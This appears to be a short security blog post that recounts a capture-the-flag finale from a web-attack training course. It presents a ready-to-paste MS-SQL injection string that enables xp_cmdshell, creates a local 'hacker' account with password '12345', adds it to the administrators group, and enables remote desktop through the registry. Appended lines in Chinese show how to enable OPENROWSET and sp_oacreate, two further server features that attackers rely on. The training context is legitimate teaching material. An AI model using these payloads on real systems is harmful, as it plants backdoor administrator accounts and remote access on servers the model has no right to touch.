Author: chaptersinwebsecurity
I've created a specialized training program for techies in Texas a couple of weeks ago.
Decided to focus on web application attacks and defense tactics.
The three-day training reached its summit with a friendly game of "capture-the-flag"
where the participants needed to locate a file containing 1000 fake credit cards on an internal
MS-SQL server and extract it somehow.
The rules were simple:
- Use HTTP requests only
- Hack your way via a given web site
- Bonus points for total administrative control at end of server compromise
The challenge was conquered within ~1 hour.
The solution to the shortest vector is now illustrated below. This is a useful short vector
for anyone penetration testing a web site with MS-SQL DB as the backend.
After finding an injectable text parameter, simply concetanating the following SQL commands:
'; EXEC sp_configure 'show advanced options',1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell',1 ; RECONFIGURE ; exec master..xp_cmdshell 'net user hacker 12345 /add'; exec master..xp_cmdshell 'net localgroup administrators hacker /add'; EXECUTE master.dbo.xp_regwrite N'HKEY_LOCAL_MACHINE',N'SYSTEM\CurrentControlSet\Control\Terminal Server',N'fDenyTSConnections',N'REG_DWORD',0;--
will achieve the following goals:
- Enable XP_CMDSHELL in case it is disabled (SQL 2005 disables it by default)
- Add a user named "hacker" with password "12345" on the target database server
- Add "hacker" user to the local "administrators" group on the target database server
- Enable the registry key allowing remote desktop access to the server
Try it at home kids, not on production machines ;-)
Feel free to email me for questions regarding the above attack string
SQL2005开启'OPENROWSET'支持的方法:
;exec sp_configure "show advanced options", 1;RECONFIGURE;exec sp_configure "Ad Hoc Distributed Queries",1;RECONFIGURE;--
SQL2005开启'sp_oacreate'支持的方法:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
